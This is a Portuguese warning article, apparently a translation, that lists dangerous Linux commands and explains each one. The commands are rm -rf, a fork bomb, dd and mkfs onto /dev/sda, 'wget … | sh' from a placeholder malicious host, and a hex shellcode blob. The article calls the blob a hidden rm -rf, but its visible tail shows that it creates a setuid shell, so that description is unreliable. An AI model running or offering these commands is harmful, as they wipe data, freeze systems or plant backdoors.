Fork Bomb

A linha de comando no GNU/Linux é muito produtiva, útil e interessante, no entanto, às vezes pode ser muito perigoso, principalmente se tratando do usuário root, ou do usuário que pode assumir a maioria dos seus privilégios, o sudo. É necessário saber exatamente o que está fazendo. Esse artigo serve para alertá-los sobre alguns comandos do terminal, para não executá-los.

1. rm -rf

O comando rm -rf é um dos maneira mais rápida de eliminar uma pasta e seu conteúdo. Mas um pouco de erro de digitação ou ignorância pode resultar em danos no sistema irrecuperáveis. Algumas das opções usadas com o comando rm é:

rm -rf

comando rm no Linux é usado para apagar arquivos.

Por isso, tenha cuidado quando você está executando o comando rm -rf. Para evitar um acidente de excluir arquivos com o comando ‘rm’, crie um alias de comando ‘rm’ como ‘rm -i’ “.bashrc”, ele irá pedir-lhe para confirmar cada exclusão.

2. :(){:|:&};:

:(){:|:&};:

A descrição acima é o fork bomb. Ele opera através da definição de uma função chamada ‘:’, que se chama duas vezes, uma no primeiro plano e uma vez no fundo. Ele mantém em execução novamente e novamente até que o sistema congela.

3. comando > /dev/sda

O comando acima escreve a saída do ‘comando’ no bloco /dev/sda. O comando acima escreve dados brutos e todos os arquivos no bloco serão substituídos por dados brutos, resultando em perda total dos dados no bloco.

4. mv diretorio /dev/null

Tudo movido para /dev/null, desaparece do sistema.

mv /home/user/* /dev/null

5. wget http://malicious_source -O- | sh

O comando acima irá baixar um script a partir de uma fonte mal-intencionada e, em seguida, executá-lo. Comando wget irá baixar o script e sh irá executar o script baixado.

Nota: Você deve ser muito consciente da fonte de onde você está baixando pacotes e scripts. Só use esses scripts/aplicações que é baixado de uma fonte confiável.

6. mkfs.ext3 /dev/sda

mkfs.ext3 /dev/sda

O comando acima irá danificar os blocos do seu HD, e formatá-lo.

7. > arquivo

echo "Nada" > arquivo.conf

Qual arquivo importante do sistema, será substituído com esse redirecionador.

A forma exata de usá-lo é criar um arquivo backup:

cp arquivo arquivo.bkp

e redirecionar com 2 “maiores que”, » , se necessário, exemplo para um source.list:

echo "link pacote deb" >> /etc/apt/source.list

8. ^foo^bar

Este comando é usado para editar o comando anterior sem a necessidade de digitar novamente todo o comando novamente. Mas isso realmente pode ser problemático se você não tomou o risco de verificar cuidadosamente a mudança no comando original usando ^ ^ foo comando bar.

9. dd if=/dev/random of=/dev/sda

dd if=/dev/random of=/dev/sda

O comando acima irá acabar com como /dev/sda e escrever dados aleatórios para o bloco. Claro! Seu sistema seria deixado na fase inconsistente e irrecuperável.

10. Comando invisível

O comando abaixo nada mais é que o primeiro comando deste artigo (rm-rf). Aqui os códigos estão escondidos em hex para que um usuário ignorante pode ser enganado. Executando o código abaixo em seu terminal e limpar sua partição raiz.

Este comando aqui mostra que a ameaça pode ser escondida e normalmente não detectável, às vezes. Você deve estar ciente de que você está fazendo e qual seria o resultado. Não compilar/rodar códigos a partir de uma fonte desconhecida.

 char esp[] __attribute__ ((section(“.text”))) /* e.s.p
 release */
 =\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
 “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
 “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
 “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
 “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
 “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
 “\x6e\x2f\x73\x68\x00\x2d\x63\x00″
 “cp -p /bin/sh /tmp/.beyond; chmod 4755
 /tmp/.beyond;”;

Veja um vídeo bem legal onde resume os 5 mais perigosos

NÃO EXECUTE NENHUM COMANDO ACIMA, CASO QUEIRA TESTÁ-LOS, UTILIZE UM A MÁQUINA VIRTUAL PARA TESTES

Via: http://www.tecmint.com/10-most-dangerous-commands-you-should-never-execute-on-linux/